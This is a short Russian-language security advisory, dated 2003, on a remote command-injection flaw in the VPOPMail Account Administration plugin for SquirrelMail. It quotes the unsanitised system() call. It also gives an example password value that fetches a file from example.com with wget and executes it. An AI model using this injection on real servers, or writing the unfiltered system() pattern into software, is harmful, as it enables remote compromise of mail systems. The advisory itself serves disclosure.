Выполнение произвольных команд в 'VPOPMail Account Administration'

Дата публикации:
18.03.2003
Всего просмотров:
718
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
VPOPMail Account Administration 0.x
Описание: Уязвимость в проверке правильности ввода обнаружена в плагине 'VPOPMail Account Administration' для SquirrelMail и vpopmail. Удаленный пользователь может выполнять произвольные команды на системе.

Программа не фильтрует пароль пользователя в сценарии 'vpopmail.php', перед его принятием в запросе system():

system("$vpasswd $username $pwd");
В результате удаленный пользователь может представить специально обработанное значение для пароля, которое содержит команды оболочки, которые будут выполнены на целевом сервере. Пример:
 
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;
Команды будут выполнены с привилегиями процесса 'vpopmail'.

Уязвимость обнаружена в VPOPMail Account Administration (squirrel mail) 0.9.7

Ссылки: VPOPMail Account Administration (squirrel mail) version 0.9.7

или введите имя

CAPTCHA